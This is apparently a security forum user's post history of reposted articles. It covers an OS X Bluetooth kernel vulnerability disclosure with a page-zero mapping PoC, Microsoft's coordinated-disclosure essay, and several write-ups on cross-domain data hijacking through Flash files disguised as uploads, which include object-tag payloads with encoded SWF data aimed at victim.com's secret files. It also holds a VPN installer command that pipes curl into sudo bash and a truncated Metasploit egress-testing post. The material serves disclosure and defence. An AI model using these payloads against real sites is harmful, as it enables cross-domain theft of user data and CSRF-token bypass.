-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
Analyzing Man-in-the-Browser (MITB) Attacks The Matrix is real and living inside your browser. How do you ask? In the form of malware that is targeting your financial institutions. Though, the machines creating this malware do not have to target the institution, rather your Internet browser. By changing what you see in the browser, the attackers now have the ability to steal any information that you enter and display whatever they choose. This has become known as the Man-in-the-Browser (MITB) attack. Download: https://www.sans.org/reading-room/whitepapers/forensics/analyzing-man-in-the-browser-mitb-attacks-35687
-
- 1
-
-
(This post is a joint work with @joystick, see also his blog here) Motivated by our previous findings, we performed some more tests on service IOBluetoothHCIController of the latest version of Mac OS X (Yosemite 10.10.1), and we found five additional security issues. The issues have been reported to Apple Security and, since the deadline we agreed upon with them expired, we now disclose details & PoCs for four of them (the last one was notified few days later and is still under investigation by Apple). All the issues are in class IOBluetoothHCIController, implemented in the IOBluetoothFamily kext (md5 e4123caff1b90b81d52d43f9c47fec8f). [h=3]Issue 1 (crash-issue1.c)[/h] Many callback routines handled by IOBluetoothHCIController blindly dereference pointer arguments without checking them. The caller of these callbacks, IOBluetoothHCIUserClient::SimpleDispatchWL(), may actually pass NULL pointers, that are eventually dereferenced. More precisely, every user-space argument handled by SimpleDispatchWL() consists of a value and a size field (see crash-issue1.c for details). When a user-space client provides an argument with a NULL value but a large size, a subsequent call to IOMalloc(size) fails, returning a NULL pointer that is eventually passed to callees, causing the NULL pointer dereference. The PoC we provide targets method DispatchHCICreateConnection(), but the very same approach can be used to cause a kernel crash using other callback routines (basically any other callback that receives one or more pointer arguments). At first, we ruled out this issue as a mere local DoS. However, as discussed here, Yosemite only partially prevents mapping the NULL page from user-space, so it is still possible to exploit NULL pointer dereferences to mount LPE attacks. For instance, the following code can be used to map page zero: Mac:tmp $ cat zeropage.c [TABLE] [TR] [TD][/TD] [TD]#include <mach/mach.h> #include <mach/mach_vm.h> #include <mach/vm_map.h> #include <stdio.h> int main(int argc, char **argv) { mach_vm_address_t addr = 0; vm_deallocate(mach_task_self(), 0x0, 0x1000); int r = mach_vm_allocate(mach_task_self(), &addr, 0x1000, 0); printf("%08llx %d\n", addr, r); *((uint32_t *)addr) = 0x41414141; printf("%08x\n", *((uint32_t *)addr)); } [/TD] [/TR] [/TABLE] Mac:tmp $ llvm-gcc -Wall -o zeropage{,.c} -Wl,-pagezero_size,0 -m32 Mac:tmp $ ./zeropage 00000000 0 41414141 Mac:tmp $ Trying the same without the -m32 flag results in the 64-bit Mach-O being blocked at load time by the OS with message "Cannot enforce a hard page-zero for ./zeropage" (unless you do it as "root", but then what’s the point?). [h=3]Issue 2 (crash-issue2.c)[/h] As shown in the screenshot below, IOBluetoothHCIController::BluetoothHCIChangeLocalName() is affected by an "old-school" stack-based buffer overflow, due to a bcopy(src, dest, strlen(src)) call where src is fully controlled by the attacker. To the best of our knowledge, this bug cannot be directly exploited due to the existing stack canary protection. However, it may still be useful to mount a LPE attack if used in conjunction with a memory leak vulnerability, leveraged to disclose the canary value. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Issue 2, a plain stack-based buffer overflow[/TD] [/TR] [/TABLE] [h=3]Issue 3 (crash-issue3.c)[/h] IOBluetoothHCIController::TransferACLPacketToHW() receives as an input parameter a pointer to an IOMemoryDescriptor object. The function carefully checks that the supplied pointer is non-NULL; however, regardless of the outcome of this test, it then dereferences the pointer (see the figure below, the attacker-controlled input parameter is stored in register r15). The IOMemoryDescriptor object is created by the caller (DispatchHCISendRawACLData()) using the IOMemoryDescriptor::withAddress() constructor. As this constructor is provided with a user-controlled value, it may fail and return a NULL pointer. See Issue 1 discussion regarding the exploitability of NULL pointer dereferences on Yosemite. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Issue 3, the module checks if r15 is NULL, but dereferences it anyway[/TD] [/TR] [/TABLE] [h=3]Issue 4 (lpe-issue1.c)[/h] In this case, the problem is due to a missing sanity check on the arguments of the following function: IOReturn BluetoothHCIWriteStoredLinkKey( uint32_t req_index, uint32_t num_of_keys, BluetoothDeviceAddress *p_device_addresses, BluetoothKey *p_bluetooth_keys, BluetoothHCINumLinkKeysToWrite *outNumKeysWritten); The first parameter, req_index, is used to find an HCI Request in the queue of allocated HCI Requests (thus this exploit requires first to fill this queue with possibly fake requests). The second integer parameter (num_of_keys) is used to calculate the total size of the other inputs, respectively pointed by p_device_addresses and p_bluetooth_keys. As shown in the screenshot below, these values are not checked before being passed to function IOBluetoothHCIController::SendHCIRequestFormatted(), which has the following prototype: IOReturn SendHCIRequestFormatted(uint32_t req_index, uint16_t inOpCode, uint64_t outResultsSize, void *outResultBuf, const char *inFormat, ...); [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Issue 4, an exploitable buffer overflow (click to enlarge)[/TD] [/TR] [/TABLE] The passed format string "HbbNN" will eventually cause size_of_addresses bytes to be copied from p_device_addresses to outResultBuf in reverse order (the 'N' format consumes two arguments, the first is a size, the second a pointer to read from). If the calculated size_of_addresses is big enough (i.e., if we provide a big enough num_of_keys parameter), the copy overflows outResultBuf, thrashing everything above it, including a number of function pointers in the vtable of a HCI request object. These pointers are overwritten with attacker-controlled data (i.e., those pointed by p_bluetooth_keys) and called before returning to userspace, thus we can divert the execution wherever we want. As a PoC, lpe-issue1.c exploits this bug and attempts to call a function located at the attacker-controller address 0x4141414142424242. Please note that the attached PoC requires some more tuning before it can cleanly return to user-space, since more than one vtable pointer is corrupted during the overflow and needs to be fixed with valid pointers. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Execution of our "proof-of-concept" exploit (Issue 4)[/TD] [/TR] [/TABLE] [h=3]Notes[/h] All the PoCs we provide in this post are not "weaponized", i.e., they do not contain a real payload, nor they attempt to bypass existing security features of Yosemite (e.g., kASLR and SMEP). If you’re interested in bypass techniques (as you probably are, if you made it here), Ian Beer of Google Project Zero covered pretty much all of it in a very thorough blog post. In this case, he used a leak in the IOKit registry to calculate kslide and defeat kASLR, while he used an in-kernel ROP-chain to bypass SMEP. More recently, @i0n1c posted here about how kASLR is fundamentally broken on Mac OS X at the moment. [h=3]Conclusions[/h] Along the last issue identified, we shared with Apple our conclusions on this kext: according to the issues we identified, we speculate there are many other crashes and LPE vulnerabilities in it. Ours, however, is just a best-effort analysis done in our spare time, and given the very small effort that took us to identify the vulnerabilities, we would suggest a serious security evaluation of the whole kext code. [h=3]Disclosure timeline[/h] 02/11: Notification of issues 1, 2 and 3. 23/11: No answer received from Apple, notification of issue 4. As no answer was received since the first contact, propose December 2 as possible disclosure date. 25/11: Apple answers requesting more time. We propose to move the disclosure date to January 12. 27/11: Apple accepts the new deadline. 05/12: Contact Apple asking for the status of the vulnerabilities. 06/12: Apple says they're still "investigating the issue". 23/12: Notification of a new issue (#5), proposing January 23 as a tentative disclosure date. 06/01: Apple asks for more time for issue #5. We propose to move the disclosure date to February 23. We remind our intention to disclose the 4 previous issues on January 12. 12/01: No answer from Apple, disclosing first 4 issues. Sursa: Roberto Paleari's blog: Time to fill OS X (Blue)tooth: Local privilege escalation vulnerabilities in Yosemite
-
A Call for Better Coordinated Vulnerability Disclosure Chris Betz 11 Jan 2015 6:49 PM For years our customers have been in the trenches against cyberattacks in an increasingly complex digital landscape. We’ve been there with you, as have others. And we aren’t going anywhere. Forces often seek to undermine and disrupt technology and people, attempting to weaken the very devices and services people have come to depend on and trust. Just as malicious acts are planned, so too are counter-measures implemented by companies like Microsoft. These efforts aim to protect everyone against a broad spectrum of activity ranging from phishing scams that focus on socially engineered trickery, to sophisticated attacks by persistent and determined adversaries. (And yes, people have a role to play – strong passwords, good policies and practices, keeping current to the best of your ability, detection and response, etc. But we’ll save those topics for another day). With all that is going on, this is a time for security researchers and software companies to come together and not stand divided over important protection strategies, such as the disclosure of vulnerabilities and the remediation of them. In terms of the software industry at large and each player’s responsibility, we believe in Coordinated Vulnerability Disclosure (CVD). This is a topic that the security technology profession has debated for years. Ultimately, vulnerability collaboration between researchers and vendors is about limiting the field of opportunity so customers and their data are better protected against cyberattacks. Those in favor of full, public disclosure believe that this method pushes software vendors to fix vulnerabilities more quickly and makes customers develop and take actions to protect themselves. We disagree. Releasing information absent context or a stated path to further protections, unduly pressures an already complicated technical environment. It is necessary to fully assess the potential vulnerability, design and evaluate against the broader threat landscape, and issue a “fix” before it is disclosed to the public, including those who would use the vulnerability to orchestrate an attack. We are in this latter camp. CVD philosophy and action is playing out today as one company - Google - has released information about a vulnerability in a Microsoft product, two days before our planned fix on our well known and coordinated Patch Tuesday cadence, despite our request that they avoid doing so. Specifically, we asked Google to work with us to protect customers by withholding details until Tuesday, January 13, when we will be releasing a fix. Although following through keeps to Google’s announced timeline for disclosure, the decision feels less like principles and more like a “gotcha”, with customers the ones who may suffer as a result. What’s right for Google is not always right for customers. We urge Google to make protection of customers our collective primary goal. Microsoft has long believed coordinated disclosure is the right approach and minimizes risk to customers. We believe those who fully disclose a vulnerability before a fix is broadly available are doing a disservice to millions of people and the systems they depend upon. Other companies and individuals believe that full disclosure is necessary because it forces customers to defend themselves, even though the vast majority take no action, being largely reliant on a software provider to release a security update. Even for those able to take preparatory steps, risk is significantly increased by publically announcing information that a cybercriminal could use to orchestrate an attack and assumes those that would take action are made aware of the issue. Of the vulnerabilities privately disclosed through coordinated disclosure practices and fixed each year by all software vendors, we have found that almost none are exploited before a “fix” has been provided to customers, and even after a “fix” is made publicly available only a very small amount are ever exploited. Conversely, the track record of vulnerabilities publicly disclosed before fixes are available for affected products is far worse, with cybercriminals more frequently orchestrating attacks against those who have not or cannot protect themselves. Another aspect of the CVD debate has to do with timing – specifically the amount of time that is acceptable before a researcher broadly communicates the existence of a vulnerability. Opinion on this point varies widely. Our approach and one that we have advocated others adopt, is that researchers work with the vendor to deliver an update that protects customers prior to releasing details of the vulnerability. There are certainly cases where lack of response from a vendor(s) challenges that plan, but still the focus should be on protecting customers. You can see our values in action through our own security experts who find and report vulnerabilities in many companies’ products, some of which we receive credit for, and many that are unrecognized publically. We don’t believe it would be right to have our security researchers find vulnerabilities in competitors’ products, apply pressure that a fix should take place in a certain timeframe, and then publically disclose information that could be used to exploit the vulnerability and attack customers before a fix is created. Responding to security vulnerabilities can be a complex, extensive and time-consuming process. As a software vendor this is an area in which we have years of experience. Some of the complexity in the timing discussion is rooted in the variety of environments that we as security professionals must consider: real world impact in customer environments, the number of supported platforms the issue exists in, and the complexity of the fix. Vulnerabilities are not all made equal nor according to a well-defined measure. And, an update to an online service can have different complexity and dependencies than a fix to a software product, decade old software platform on which tens of thousands have built applications, or hardware devices. Thoughtful collaboration takes these attributes into account. To arrive at a place where important security strategies protect customers, we must work together. We appreciate and recognize the positive collaboration, information sharing and results-orientation underway with many security players today. We ask that researchers privately disclose vulnerabilities to software providers, working with them until a fix is made available before sharing any details publically. It is in that partnership that customers benefit the most. Policies and approaches that limit or ignore that partnership do not benefit the researchers, the software vendors, or our customers. It is a zero sum game where all parties end up injured. Let’s face it, no software is perfect. It is, after all, made by human beings. Microsoft has a responsibility to work in our customers’ best interest to address security concerns quickly, comprehensively, and in a manner that continues to enable the vast ecosystem that provides technology to positively impact peoples’ lives. Software is organic, usage patterns and practices change, and new systems are built on top of products that test (and in some cases exceed) the limits of its original design. In many ways that’s the exciting part of software within the rapidly evolving world that we live in. Stating these points isn’t in any way an abdication of responsibility. It is our job to build the best possible software that we can, and to protect it continuously to the very best of our ability. We’re all in. Chris Betz Senior Director, MSRC Trustworthy Computing [Note: In our own CVD policy (available at microsoft.com/cvd), we do mention exceptions for cases in which we might release an advisory about a vulnerability in a third party’s software before an update is ready, including when the technical details have become publicly known, when there is evidence of exploitation of an unpatched vulnerability, and when the vendor fails to respond to requests for discussion.] Sursa: A Call for Better Coordinated Vulnerability Disclosure - MSRC - Site Home - TechNet Blogs
-
The pitfalls of allowing file uploads on your website These days a lot of websites allow users to upload files, but many don’t know about the unknown pitfalls of letting users (potential attackers) upload files, even valid files. What’s a valid file? Usually, a restriction would be on two parameters: The uploaded file extension The uploaded Content-Type. For example, the web application could check that the extension is “jpg” and the Content-Type “image/jpeg” to make sure it’s impossible to upload malicious files. Right? The problem is that plugins like Flash doesn’t care about extension and Content-Type. If a file is embedded using an <object> tag, it will be executed as a Flash file as long as the content of the file looks like a valid Flash file. But wait a minute! Shouldn’t the Flash be executed within the domain that embeds the file using the <object> tag? Yes and no. If a Flash file (bogus image file) is uploaded on victim.com and then embedded at attacker.com, the Flash file can execute JavaScript within the domain of attacker.com. However, if the Flash file sends requests, it will be allowed to read files within the domain of victim.com. This basically means that if a website allows file uploads without validating the content of the file, an attacker can bypass any CSRF protection on the website. The attack Based on these facts we can create an attack scenario like this: An attacker creates a malicious Flash (SWF) file The attacker changes the file extension to JPG The attacker uploads the file to victim.com The attacker embeds the file on attacker.com using an tag with type “application/x-shockwave-flash” The victim visits attacker.com, loads the file as embedded with the tag The attacker can now send and receive arbitrary requests to victim.com using the victims session The attacker sends a request to victim.com and extracts the CSRF token from the response A payload could look like this: <object style="height:1px;width:1px;" data="http://victim.com/user/2292/profilepicture.jpg" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=read&u=http://victim.com/secret_file.txt"></object> The fix The good news is that there’s a fairly easy way to prevent Flash from doing this. Flash won’t execute the file if it sends a Content-Disposition header like so: Content-Disposition: attachment; filename=”image.jpg” So if you allow file uploads or printing arbitrary user data in your service, you should always verify the contents as well as sending a Content-Disposition header where applicable. Another way to remediate issues like this is to host the uploaded files on a separate domain (like websiteusercontent.com). Other uses But the fun doesn’t stop at file uploads! Since the only requirements of this attack is that an attacker can control the data on a location of the target domain (regardless of Content-Type), there’s more than one way to perform this attack. One way would be to abuse a JSONP API. Usually, the attacker can control the output of a JSONP API endpoint by changing the callback parameter. However, if an attacker uses an entire Flash file as callback, we can use it just like we would use an uploaded file in this attack. A payload could look like this: <object style="height:1px;width:1px;" data="http://victim.com/user/jsonp?callback=CWS%07%0E000x%9C%3D%8D1N%C3%40%10E%DF%AE%8D%BDI%08%29%D3%40%1D%A0%A2%05%09%11%89HiP%22%05D%8BF%8E%0BG%26%1B%D9%8E%117%A0%A2%DC%82%8A%1Br%04X%3B%21S%8C%FE%CC%9B%F9%FF%AA%CB7Jq%AF%7F%ED%F2%2E%F8%01%3E%9E%18p%C9c%9Al%8B%ACzG%F2%DC%BEM%EC%ABdkj%1E%AC%2C%9F%A5%28%B1%EB%89T%C2Jj%29%93%22%DBT7%24%9C%8FH%CBD6%29%A3%0Bx%29%AC%AD%D8%92%FB%1F%5C%07C%AC%7C%80Q%A7Nc%F4b%E8%FA%98%20b%5F%26%1C%9F5%20h%F1%D1g%0F%14%C1%0A%5Ds%8D%8B0Q%A8L%3C%9B6%D4L%BD%5F%A8w%7E%9D%5B%17%F3%2F%5B%DCm%7B%EF%CB%EF%E6%8D%3An%2D%FB%B3%C3%DD%2E%E3d1d%EC%C7%3F6%CD0%09" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=alert&u=http://victim.com/secret_file.txt"></object> tl;dr: Send Content-Disposition headers for uploaded files and validate your JSONP callback names. Or put the uploaded files on a separate domain And like always, if you want to know if your website has issues like these, try a Detectify scan! That’s it for now. Written by: Mathias, Frans Sursa: Detectify Blog – The pitfalls of allowing file uploads on your...
-
Content-Type Blues Assuming an attacker can control the start of a CSV file served up by a web application, what damage could be done? The example PHP code below serves up a basic CSV file, but allows the user to control the column names. Note that the Content-Type header is at least set properly. <?php header('Content-Type: text/csv'); header('Content-Disposition: inline; filename=blah.csv'); header('Content-Length: ' . 20); echo $_GET["columnNames"] . "\r\n"; echo "1,2,3,4,5\r\n"; echo "data,we,do,not,control"; ?> Our first attempt might involve injecting in a XSS payload. http://target/csvServe.php?columnNames=a,b,c,d,e<html><body><script>alert(1)</script></body</html> This seems like a reasonable approach since the application accepts and uses the columnNames parameter without performing any input validation or output encoding. But, the browser, even our old friend IE, will not render the content as HTML due to the Content-Type header’s value (text/csv). Note that this would be exploitable if the Content-Type header was set to text/plain instead, because IE will perform content sniffing in that situation. Out of luck? Nope, just inject in an entire SWF file into the columnNames parameter. A SWF’s origin is the domain from which it was retrieved from, similar to a Java applet (uses IP addresses instead of domain names though), therefore a malicious page could embed a SWF, which originates from the target’s domain that could make arbitrary requests to the target domain and read the responses (steal sensitive data, defeat CSRF protections, and other generally nasty actions). But, what about the data in the CSV that we don’t control? The Flash Player will ignore the content following a well formed SWF and execute the SWF properly. The following JavaScript code snippet demonstrates this technique. Since both browsers and HTTP servers impose limits on the length of URLs, I would recommend writing the payload in ActionScript 2 using a command-line compiler like MTASC or an assembler like Flasm in order to craft a small SWF. Sadly, Flex is bloated, so mxmlc is not an option. <script> var flashvars = {}; var params = {}; var attributes = {}; var url="http://target/csvServe.php?columnNames=CWS%07%AA%01%00%00x%DADP%C1N%021%14%9C%ED%22-j0%21%24%EB%81%03z%E3%E2%1F%18XI%88%1E%607%C0%C1%8B%D9%ACP%91X%ECf%A9%01%BF%40N%1C%F7%E6%DD%CF%F1%8F%F0%B5K%E2%3BL%DFL%DA%E9%9B%B7%05%FF%05%82%0Chz%E8%B3%03U%AD%0A%AA%D8%23%E8%D6%9B%84%D4%C5I%12%A7%B3%B7t%21%D77%D3%0F%A3q%A8_%DA%0B%F1%EE%09gpJ%B2P%FA9U0%2FHr%AD%0Df%B9L%8D%9C%CA%AD%19%2C%A5%9A%C3P%87%7B%A9%94not%AE%E6%ED%2Bd%B96%DA%7Cf%12%ABt%F9%8E4%CB%10N%26%D2%C4%B9%CE%06%2A%5D%ACQ0%08%B4%1A%8Do%86%1FG%BC%96%93%F6%C2%0E%C9%3A%08Q%5C%83%3F2%80%B7%7D%02%2B%FF%83%60%DC%A6%11%BE%7BU%19%07%F6%28%09%1B%15%15%88%13Q%8D%BE%28ID%84%28%1F%11%F1%82%92%88%FD%B9%0D%EFw%C0V34%8F%B3%145%88Zi%8E%5E%14%15%17%E0v%13%AC%E2q%DF%8A%A7%B7%01%BA%FE%1D%B5%BB%16%B9%0C%A7%E1%A4%9F%0C%C3%87%11%CC%EBr%5D%EE%CA%A5uv%F6%EF%E0%98%8B%97N%82%B9%F9%FCq%80%1E%D1%3F%00%00%00%FF%FF%03%00%84%26N%A8"; swfobject.embedSWF(url, "content", "400", "200", "10.0.0", "expressInstall.swf", flashvars, params, attributes); </script> Ideally, web applications wouldn’t accept arbitrary content to build a CSV, but the Flash Player could also take steps to prevent this attack from occurring. The following improvements could be made, but will likely break some existing RIAs that fail to set the Content-Type header properly on their SWFs. 1) Refuse to play any SWF that does not have a correct MIME type (application/x-shockwave-flash). 2) Refuse to play any SWF that has erroneous data at the end of the file. Moral of the story: setting the content type properly is not a substitute for proper input validation. Sursa: Content-Type Blues | dead && end
-
Even uploading a JPG file can lead to Cross Domain Data Hijacking Even uploading a JPG file can lead to Cross Domain Data Hijacking (client-side attack)! Introduction: This post is going to introduce a new technique that has not been covered previously in other topics that are related to file upload attacks such as Unrestricted file upload and File in the hole. Update 1 (21/05/2014): It seems @fransrosen and @avlidienbrunn were quicker than me in publishing this technique! Yesterday they have published a very good blog post about this issue: Detectify Blog – The pitfalls of allowing file uploads on your... I highly recommend the readers to read the other blog post as well especially for its nice JSONP trick. I wanted to wait until end of this week to publish mine but now that this technique is already published, I release my post too. The draft version of this post and PoCs were ready before but I was not sure when I am going to publish this as it would affect a lot of websites; this was a note for bug bounty hunters! The only point of this blog post now is the way that I had looked at the issue initially. Update 2 (21/05/2014) Ok! People in twitter were very resourceful and reminded me that this was not in fact a new technique and some other bug bounty hunters are already using it in their advisories! I wish they had documented this properly before. The following links are related to this topic: Content-Type Blues | dead && end (Content-Type Blues) https://bounty.github.com/researchers/adob.html (Flash content-type sniffing) How safe is the file uploader? Imagine that there is a file uploader that properly validates the uploaded file’s extension by using a white-list method. This file uploader only allows a few non-dangerous extensions such as .jpg, .png, and .txt. Moreover, it checks the filename to not contain any non-alphanumeric characters! This seems to be a simple and a safe method to protect the server and its users if risks of file processors’ bugs and file inclusion attacks have already been accepted. What can possibly go wrong? This file uploader does not have any validation for the file’s content and therefore it is possible to upload a malicious file with a safe name and extension on the server. However, when the server is properly configured, this file cannot be run on the server. Moreover, the file will be sent to the client with an appropriate content-type such a text/plain or image/jpeg; as a result, an attacker cannot exploit a cross-site scripting issue by opening the uploaded file directly in the browser. Enforcing the content-type by using an OBJECT tag! If we could change the file’s content-type for the browsers, we would be able to exploit this issue! But nowadays this is not simply possible directly as this counts as a security issue for the browser… I knew straight away that the “OBJECT” tag has a “TYPE” attribute but I was not sure which content-types will force the browser to actually load the object instead of showing the contents (“OBJECT” tag can act as an IFrame). I have created a test file (located at Object content-type test) that loads the object tags with the different mime-types and the result is as follows (Java and Silverlight were not installed): “application/futuresplash”: load the file as a Flash object “application/x-shockwave-flash”: load the file as a Flash object “text/x-component”: only works in IE to load .htc files(?) “application/pdf” and a few others: load the file as a PDF object The result can be different with having different plugins installed. So I can load any uploaded file as a flash file. Now I can upload a malicious flash file into the victim’s server as a .JPG file, and then load it as flash file in my own website. Please note that there is no point for me to upload a flash file that is vulnerable to XSS as it would run under my website’s domain instead of the target. Exploitation I found out that the embedded flash can still communicate with its source domain without checking the cross-domain policy. This makes sense as the flash file belongs to the victim’s website actually. As a result, the flash file that has been uploaded as a .JPG file in the victim’s website can load important files of the victim’s website by using current user’s cookies; then, it can send this information to a JavaScript that is in the attacker’s website which has embedded this JPG file as a Flash file. The exploitation is like a CSRF attack, you need to send a malicious link to a user who is already logged-in in the victim’s website (it still counts as CSRF even if you are not logged-in but this is out the scope of this post). The malicious Flash should have already been uploaded in the victim’s website. If the uploader is vulnerable to a CSRF attack itself, an attacker can first upload a malicious Flash file and then use it to hijack the sensitive data of the user or perform further CSRF attacks. As a result, an attacker can collect valuable information that are in the response of different pages of the victim’s website such as users’ data, CSRF tokens, etc. The following demonstrates this issue: A) 0me.me = attacker’s website sdl.me = victim’s website C) A JPG file that is actually a Flash file has already been uploaded in the victim’s website: http://sdl.me/PoCs/CrossDomainDataHijack.jpg (Source code of this Flash file is accessible via the following link: http://0me.me/demo/SOP/CrossDomainDataHijack.as.txt ) D) There is a secret file in the victim’s website (sdl.me) that we are going to read by using the attacker’s website (0me.me): http://sdl.me/PoCs/secret.asp?mysecret=original E) Note that the victim’s website does not have any crossdomain.xml file: http://sdl.me/crossdomain.xml F) Now an attacker sends the following malicious link to a user of sdl.me (the victim’s website): Cross Domain Data Hijack By pressing the “RUN” button, 0me.me (attacker’s website) website can read contents of the secret.asp file which was in sdl.me (victim’ website). This is just a demo file that could be completely automated in a real scenario. Note: If another website such as Soroush.me has added sdl.me as trusted in its crossdomain.xml file, the attacker’s website can also now read the contents of Soroush.me by using this vulnerability. Limitations An attacker cannot read the cookies of the victim.com website. An attacker cannot run a JavaScript code directly by using this issue. Future works Other client-side technologies such as PDF, Java applets, and Silverlight might be used instead of the Flash technology. Bypassing the Flash security sandbox when a website uses “Content-Disposition: attachment;” can also be a research topic. If somebody bypasses this, many mail servers and file repositories will become vulnerable. Recommendations It is recommended to check the file’s content to have the correct header and format. If it is possible, use “Content-Disposition: attachment; filename=Filename.Extension;” header for the files that do not need to be served in the web browser. Flash actually logs a security warning for this. Isolating the domain of the uploaded files is also a good solution as long as the crossdomain.xml file of the main website does not include the isolated domain. Sursa: https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/
-
Cross-Site Content Hijacking (XSCH) PoC License Released under AGPL (see LICENSE for more information). Description This project can be used for: Exploiting websites with insecure policy files (crossdomain.xml or clientaccesspolicy.xml) by reading their contents. Exploiting insecure file upload functionalities which do not check the file contents properly or allow to upload SWF or PDF files without having Content-Disposition header during the download process. In this scenario, the created SWF, XAP, or PDF file should be uploaded with any extension such as .JPG to the target website. Then, the "Object File" value should be set to the URL of the uploaded file to read the target website's contents. Note: .XAP files can be renamed to any other extension but they cannot be load cross-domain anymore. It seems Silverlight finds the file extension based on the provided URL and ignores it if it is not .XAP. This can still be exploited if a website allows users to use ";" or "/" after the actual file name to add a ".XAP" extension. Usage Exploiting an insecure policy file: 1) Host the ContentHijacking directory with a web server. 2) Browse to the ContentHijacking.html page. 3) Change the target in the HTML page to a suitable object from the "objects" directory ("xfa-manual-ContentHijacking.pdf" cannot be used). Exploiting an insecure file upload/download: 1) Upload an object file from the "objects" directory to the victim server. These files can also be renamed with another extension when uploaded to another domain (for this purpose, first use Flash and then PDF as Silverlight XAP files will not normally work with another extension from another domain). 2) Change the target in the HTML page to the location of the uploaded file. Note: .XAP files can be renamed to any other extension but they cannot be load cross-domain anymore. It seems Silverlight finds the file extension based on the provided URL and ignores it if it is not .XAP. This can still be exploited if a website allows users to use “;” or “/” after the actual file name to add a “.XAP” extension. Note: When Silverlight requests a .XAP file cross-domain, the content type must be: application/x-silverlight-app. Note: PDF files can only be used in Adobe Reader viewer (they will not work with Chrome and Firefox built-in PDF viewers) Usage Example: in IE with Adobe Reader: https://15.rs/ContentHijacking/ContentHijacking.html?objFile=objects/ContentHijacking.pdf&objType=PDF&target=http://0me.me/&POSTData=Param1=Value1 Generic Recommendation to Solve the Security Issue The file types allowed to be uploaded should be restricted to only those that are necessary for business functionality. The application should perform filtering and content checking on any files which are uploaded to the server. Files should be thoroughly scanned and validated before being made available to other users. If in doubt, the file should be discarded. Adding “Content-Disposition: Attachment” header to static files will secure the website against Flash/PDF-based cross-site content hijacking attacks. It is recommended to perform this practice for all of the files that users need to download in all the modules that deal with a file download. Although this method does not secure the website against attacks by using Silverlight or similar objects, it can mitigate the risk of using Adobe Flash and PDF objects especially when uploading PDF files is permitted. Flash/PDF (crossdomain.xml) or Silverlight (clientaccesspolicy.xml) cross-domain policy files should be removed if they are not in use and there is no business requirement for Flash or Silverlight applications to communicate with the website. Cross-domain access should be restricted to a minimal set of domains that are trusted and will require access. An access policy is considered weak or insecure when a wildcard character is used especially in the value of the “uri” attribute. Any "crossdomain.xml" file which is used for Silverlight applications should be considered weak as it can only accept a wildcard (“*”) character in the domain attribute. Browser caching should be disabled for the corssdomain.xml and clientaccesspolicy.xml files. This enables the website to easily update the file or restrict access to the Web services if necessary. Once the client access policy file is checked, it remains in effect for the browser session so the impact of non-caching to the end-user is minimal. This can be raised as a low or informational risk issue based on the content of the target website and security and complexity of the policy file(s). Note: Using "Referer" header cannot be a solution as it is possible to set this header for example by sending a POST request using Adobe Reader and PDF (see the "xfa-manual-ContentHijacking.pdf" file in the "objects" directory). Project Page See the project page for the latest update/help: https://github.com/nccgroup/CrossSiteContentHijacking Author Soroush Dalili (@irsdl) from NCC Group References Even uploading a JPG file can lead to Cross Domain Data Hijacking (client-side attack)! https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/ Multiple PDF Vulnerabilities - Text and Pictures on Steroids InsertScript: Multiple PDF Vulnerabilities - Text and Pictures on Steroids HTTP Communication and Security with Silverlight http://msdn.microsoft.com/en-gb/library/cc838250(v=vs.95).aspx Explanation Of Cross Domain And Client Access Policy Files For Silverlight http://www.devtoolshed.com/explanation-cross-domain-and-client-access-policy-files-silverlight Cross-domain policy file specification Cross-domain policy file specification | Adobe Developer Connection Setting a crossdomain.xml file for HTTP streaming Setting crossdomain.xml file for HTTP streaming | Adobe Developer Connection Sursa: https://github.com/nccgroup/CrossSiteContentHijacking
-
[h=1][/h] [h=3]Requirements[/h] Ubuntu 14.04 512 MB RAM [h=3]Install[/h] [h=5]curl -sS https://sockeye.cc/instavpn.sh | sudo bash[/h] [h=3]Web UI[/h] Browse at http://IP-ADDRESS:8080 [h=3]CLI[/h] instavpn list - Show all credentials instavpn stat - Show bandwidth statistics instavpn psk get - Get pre-shared key instavpn psk set <psk> - Set pre-shared key instavpn user get <username> - Get password instavpn user set <username> <password> - Set password or create user if not exists instavpn user delete <username> - Delete user instavpn user list - List all users instavpn web mode [on|off] - Turn on/off web UI instavpn web set <username> <password> - Set username/password for web UI Sursa: https://github.com/sockeye44/instavpn
-
[h=3]Metasploit: Getting outbound filtering rules by tracerouting[/h] Deciding between a bind or reverse shell depends greatly on the network environment in which we find ourselves. For example, in the case of choosing a bind shell we have to know in advance if your machine is reachable on any port from outside. Some time ago I wrote how we can get this information (inbound filtering rules) using the packetrecorder script from Meterpreter. Another alternative is to use a IPV6 bind shell (bind_ipv6_tcp). The idea of this payload is to create an IPv6 tunnel over IPv4 with Teredo-relay through which it will make the bind shell achievable from an IPv6 address. You can read more info about this in the post: Revenge of the bind shell. On the other hand, in the case of using a reverse shell, we must know the outbound filtering rules of the organization to see if our shell can go outside. In most situations, we usually choose 80 or 443 ports since these ports are rarely blocked for an ordinary user. However, there are cases in which we have a much more restrictive scenario. For example, if we get access to a server from an internal network and want to install a reverse shell from that server to the outside, maybe outgoing connections on ports 80 and 443 are denied. The reverse_tcp_allports() payload was created to work in such environments. This payload will attempt to connect to our handler (installed on certain external machine) using multiple ports. The payload supports the argument LPORT by which we specify the initial connection port. If It can not connect to the handler it will increase the port number 1 by 1 until a connection is done. The problem with this approach is that it is very slow due to timeouts of blocked connections. In addition, much noise is generated as a result of each of these connections. Because of the need to know which outgoing ports are allowed, I have made a post-exploitation Meterpreter module that allows you to infer TCP filtering rules for the desired ports. At first I thought to use the same logic as the MetaModule "Egrees Firewall Testing" built into Metasploit Pro v4.7. This MetaModule allows you to get outbound rules by sending SYN packets to one of the servers hosted by Rapid7 (egadz.metasploit.com). The server is configured to respond to all ports (all 65535 ports are open), 